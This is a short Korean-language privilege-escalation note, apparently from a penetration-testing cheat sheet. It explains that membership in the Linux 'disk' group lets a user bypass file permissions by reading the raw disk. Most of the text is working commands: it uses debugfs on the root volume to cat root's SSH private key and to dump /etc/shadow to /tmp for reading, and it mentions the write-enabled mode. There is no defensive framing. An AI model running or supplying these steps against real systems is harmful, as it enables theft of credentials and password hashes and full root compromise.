일반 유저는 파일 시스템의 권한에 막혀 다른 유저의 파일을 볼 수 없다. 하지만 disk 그룹에 속해 있으면 파일 시스템의 권한을 무시하고 디스크 블록 자체를 직접 읽을 수 있다. 거기다가 root directory (/) 같은 곳에 마운트 되어있는 디스크가 있다면 모든 파일 시스템을 다 접근할 수 있다는 것과 같다.
df -h 로 디스크 확인
df -h
debugfs [disk]
cat /root/.ssh/id_rsa
만약 debugfs 가 설치되어 있다면:
# 1. disk 그룹 권한으로 장치 열기
debugfs /dev/mapper/ubuntu--vg-ubuntu--lv
# 1.1 파일을 생성하고 싶을 경우 -w 옵션을 붙여야함
debugfs -w /dev/mapper/ubuntu--vg-ubuntu--lv
# 2. debugfs 내부에서 루트 권한 파일 가져오기
debugfs: dump /etc/shadow /tmp/shadow_copy
# 3. 이제 /tmp/shadow_copy는 내가 읽을 수 있는 파일이 됨
cat /tmp/shadow_copy